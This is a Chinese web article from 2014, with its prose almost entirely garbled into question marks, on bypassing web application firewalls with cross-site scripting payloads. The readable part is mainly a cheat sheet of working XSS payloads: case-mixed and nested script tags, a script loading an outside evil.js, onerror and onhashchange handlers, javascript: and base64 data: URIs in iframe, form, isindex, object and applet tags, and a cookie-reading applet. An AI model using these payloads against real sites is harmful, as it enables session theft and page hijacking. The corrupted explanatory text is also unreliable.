XSS???WAF??????????????
???????????? ???????[ 2014/7/2 15:42:34 ] ??????????????? ???????
???????????
????1??????????payload??????<b>??<i>??<u>?????????ж???ó??????HTML??????????????????????<>????
????2???????????????????????????payload??<b??<i??<marquee??????????
????3?????????μ?payload
????<script>alert(1);</script>
????<script>prompt(1);</script>
????<script>confirm (1);</script>
????<script src="http://rhainfosec.com/evil.js">
?????ж?????????????????????Сд??????
????<scRiPt>alert(1);</scrIPt>
????1???????Сд???е????<script>?????????<scr<script>ipt>alert(1)</scr<script>ipt>??
????2?????<a>???????
????<a href=“http://www.google.com">Clickme</a>
????<a???????
????href???????
??????????????????
?????????й?????????<a href=”javascript:alert(1)”>Clickme</a>
????????????????????????<a href=”rhainfosec.com” onclimbatree=alert(1)>ClickHere</a>
????HTML5???150?????????????????????????????<body/onhashchange=alert(1)><a href=#>clickit
???????????????
????src????
|
<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>
iframe
<iframesrc="javascript:alert(2)">
<iframe/src="data:text/html;	base64
??PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
Embed
<embed/src=//goo.gl/nlX0P>
Action
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<isindex action=data:text/html?? type=image>
mario???
<formaction='data:text/html??<script>alert(1)</script>'><button>CLICK
“formaction”????
<isindexformaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript:alert(1)>CLICKME
“background”????
<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
“posters” ????
<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
“data”????
<object data="data:text/html;base64??PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
“code”????
<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com